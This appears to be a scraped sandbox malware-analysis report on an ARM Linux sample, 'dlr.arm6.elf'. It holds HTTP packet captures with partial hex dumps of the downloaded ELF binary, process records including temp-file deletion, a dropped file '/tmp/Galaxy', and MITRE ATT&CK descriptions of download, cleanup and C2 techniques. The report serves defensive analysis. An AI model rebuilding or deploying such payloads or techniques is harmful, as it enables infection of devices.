Dec 30, 2024 02:17:53.360662937 CET	711	IN	HTTP/1.0 200 OK Accept-Ranges: bytes Content-Length: 76632 Content-Type: application/octet-stream Last-Modified: Wed, 25 Dec 2024 10:50:30 GMT Date: Mon, 30 Dec 2024 01:17:52 GMT Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 54 81 00 00 34 00 00 00 78 29 01 00 02 00 00 04 34 00 20 00 03 00 28 00 0c 00 0b 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 fc 25 01 00 fc 25 01 00 05 00 00 00 00 80 00 00 01 00 00 00 00 26 01 00 00 26 02 00 fc 25 02 00 08 03 00 00 90 d6 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 04 29 02 00 00 00 00 00 fc 25 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff 2f 11 30 00 9f e5 00 30 90 e5 00 00 53 e3 03 00 00 0a 24 30 9f e5 00 00 53 e3 0f e0 a0 11 13 ff 2f 11 04 d0 8d e2 04 e0 9d e4 1e ff 2f e1 00 00 00 00 fc 25 02 00 08 29 02 00 08 26 02 00 00 00 [TRUNCATED] Data Ascii: ELF(T4x)4 (%%&&%Qtd-L@-,@0S 0S/00@/)%-@0SM88/00S$0S//%)& ---0/*G-p `p00PPPUG/p@P$-
Dec 30, 2024 02:17:53.360759020 CET	1236	IN	Data Raw: 04 00 a0 e1 dc 2c 00 eb da 18 00 eb aa 17 00 eb 6c 30 9f e5 00 00 d3 e5 00 00 50 e3 0e 00 00 0a 60 30 9f e5 00 10 93 e5 00 c0 91 e5 04 30 dc e5 07 00 53 e1 05 20 a0 11 04 00 00 1a 08 00 00 ea 02 c1 91 e7 04 30 dc e5 07 00 53 e1 04 00 00 0a 01 20 Data Ascii: ,l0P`00S 0S R, 0/ )$)P@-@0S0R^@/P
Dec 30, 2024 02:17:53.360773087 CET	1236	IN	Data Raw: 00 20 84 e5 04 30 c4 e5 01 11 a0 e1 38 27 00 eb 00 30 d5 e5 00 20 a0 e1 03 41 80 e7 08 10 a0 e3 07 30 83 e0 07 00 a0 e1 00 30 c5 e5 00 20 86 e5 e2 26 00 eb 00 10 d5 e5 44 21 9f e5 00 40 a0 e1 0f 30 a0 e3 07 10 81 e0 00 00 96 e5 00 20 84 e5 04 30 Data Ascii: 08'0 A00 &D!@0 0%'0 A00 & @0 0'0 A00 & @0 0&
Dec 30, 2024 02:17:53.360790968 CET	1236	IN	Data Raw: f0 4f 2d e9 5c d0 4d e2 12 70 8d e2 00 10 8d e5 00 60 a0 e1 70 12 9f e5 02 80 a0 e1 07 00 a0 e1 36 20 a0 e3 03 a0 a0 e1 ac 20 00 eb 6d 28 00 eb 13 00 cd e5 6b 28 00 eb 14 00 cd e5 69 28 00 eb 15 00 cd e5 67 28 00 eb 16 00 cd e5 65 28 00 eb 17 00 Data Ascii: O-\Mp`p6 m(k(i(g(e(c(a(_(]( @Z(@6T%%H@D 0P 0, (0
Dec 30, 2024 02:17:53.360802889 CET	1236	IN	Data Raw: 01 90 89 e2 18 b0 8b e2 18 10 8d e2 10 20 a0 e3 08 00 8c e7 3a 00 00 0a 00 30 a0 e3 0c c0 9d e5 1c 30 8d e5 02 30 a0 e3 b8 31 cd e1 ba c1 cd e1 1e 21 00 eb 14 30 d6 e5 1f 00 53 e3 1e 00 00 9a 14 20 9d e5 06 10 a0 e1 08 00 92 e7 10 20 a0 e3 24 21 Data Ascii: :0001!0S $!0Y00)H@Dl$ !44 Q`0y`@s$,!$<$,0!"< 4
Dec 30, 2024 02:17:53.360816002 CET	956	IN	Data Raw: 09 e0 8e e0 01 39 a0 e3 10 c0 a0 e3 05 10 a0 e1 0b 00 a0 e1 0c 20 9d e5 00 e0 8d e5 04 c0 8d e5 55 20 00 eb 34 30 9d e5 01 00 83 e2 08 00 50 e1 34 00 8d e5 c0 ff ff aa c4 ff ff ea 0b 00 a0 e1 4a 15 00 eb 3c d0 8d e2 f0 4f bd e8 1e ff 2f e1 10 40 Data Ascii: 9 U 40P4J<O/@\40A$,,$<$,0,"< 44<q0E8 0CR>,xO-
Dec 30, 2024 02:17:53.360829115 CET	1236	IN	Data Raw: 08 30 c4 e5 40 30 a0 13 54 50 9d e5 b6 30 c4 11 2f 30 a0 e3 09 30 c4 e5 14 20 84 e2 08 30 a0 e3 b4 50 c4 e1 b2 80 c4 e1 b2 30 c2 e1 20 30 9d e5 18 20 d4 e5 0c 30 84 e5 b0 20 c2 e3 40 20 82 e3 09 10 81 e0 10 10 91 e5 18 20 c4 e5 18 30 d4 e5 0a 30 Data Ascii: 0@0TP0/00 0P0 0 0 @ 0000(P P0, 0@ 0 0`D;@Q0000\0,`L @H0Tp 0\@<@<P@@
Dec 30, 2024 02:17:53.360847950 CET	248	IN	Data Raw: b2 30 c5 11 d4 ff ff 1a 51 0c 00 eb 04 30 9d e5 09 50 83 e0 b2 00 c5 e1 cf ff ff ea 00 60 a0 e3 07 00 56 e1 52 1e a0 e3 64 00 a0 e3 fa ff ff aa 06 51 9a e7 7d 0c 00 eb 00 48 a0 e1 24 48 a0 e1 05 00 a0 e1 04 10 a0 e1 9c 0c 00 eb 06 01 98 e7 05 10 Data Ascii: 0Q0P`VRdQ}H$H 9`@8$,!$<$,0!"< 44<0$O/O-4MpP`!!H
Dec 30, 2024 02:17:53.360858917 CET	1236	IN	Data Raw: 01 40 44 e2 06 10 a0 e1 07 20 a0 e3 04 30 a0 e1 00 80 a0 e1 05 00 a0 e1 fa f8 ff eb 06 10 a0 e1 06 20 a0 e3 04 30 a0 e1 00 b0 a0 e1 05 00 a0 e1 f4 f8 ff eb 06 10 a0 e1 00 98 a0 e1 00 20 a0 e3 02 3c a0 e3 05 00 a0 e1 ee f8 ff eb 01 20 a0 e3 02 30 Data Ascii: @D 0 0 < 0,X )Z )<$` LW@(4#8",0 0 0$0020
Dec 30, 2024 02:17:53.360872984 CET	1236	IN	Data Raw: 01 10 a0 e3 06 00 80 e2 cb 1f 00 eb 00 30 d0 e5 b0 30 c3 e3 40 30 83 e3 00 30 c0 e5 00 20 d0 e5 2c 30 9d e5 0a 20 c2 e3 00 50 a0 e1 00 00 53 e3 10 00 96 e5 05 20 82 e3 06 30 a0 e3 00 20 c5 e5 09 30 c5 e5 10 00 85 e5 20 00 9d e5 40 10 a0 13 01 00 Data Ascii: 00@00 ,0 PS 0 0 @(< p @000 000 000 0 P 0 0@0QDL
Dec 30, 2024 02:17:53.367002964 CET	1236	IN	Data Raw: b0 1b 00 eb 01 00 70 e3 51 01 00 0a 40 20 9d e5 00 00 5b e3 02 08 a0 e1 60 80 9d 05 ff 40 04 e2 20 38 a0 e1 64 40 8d e5 50 30 8d e5 28 a0 88 02 e2 00 00 0a 48 10 9d e5 01 80 08 e2 01 10 01 e2 30 c0 9d e5 1c 10 8d e5 24 80 8d e5 44 20 9d e5 5c 80 Data Ascii: pQ@ [`@ 8d@P0(H0$D \P,`p 0`,`(p 8`4ph0 ( pl +l0,S

System Behavior

Analysis Process: dash PID: 5467, Parent PID: 3633

General

Start time (UTC):	01:17:45
Start date (UTC):	30/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5467, Parent PID: 3633

General

Start time (UTC):	01:17:45
Start date (UTC):	30/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: dash PID: 5468, Parent PID: 3633

General

Start time (UTC):	01:17:45
Start date (UTC):	30/12/2024
Path:	/usr/bin/dash
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: rm PID: 5468, Parent PID: 3633

General

Start time (UTC):	01:17:45
Start date (UTC):	30/12/2024
Path:	/usr/bin/rm
Arguments:	rm -f /tmp/tmp.7ovVSDsvBA /tmp/tmp.I0M6MszF3i /tmp/tmp.Qu4gWkzb61
File size:	72056 bytes
MD5 hash:	aa2b5496fdbfd88e38791ab81f90b95b

Chronological Activities

Analysis Process: dlr.arm6.elf PID: 5480, Parent PID: 5400

General

Start time (UTC):	01:17:51
Start date (UTC):	30/12/2024
Path:	/tmp/dlr.arm6.elf
Arguments:	/tmp/dlr.arm6.elf
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report dlr.arm6.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/tmp/Galaxy

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Packets

System Behavior

Analysis Process: dash PID: 5467, Parent PID: 3633

General

Chronological Activities

Analysis Process: rm PID: 5467, Parent PID: 3633

General

Chronological Activities

Analysis Process: dash PID: 5468, Parent PID: 3633

General

Chronological Activities

Analysis Process: rm PID: 5468, Parent PID: 3633

General

Chronological Activities

Analysis Process: dlr.arm6.elf PID: 5480, Parent PID: 5400

General

Chronological Activities

Linux Analysis Report
dlr.arm6.elf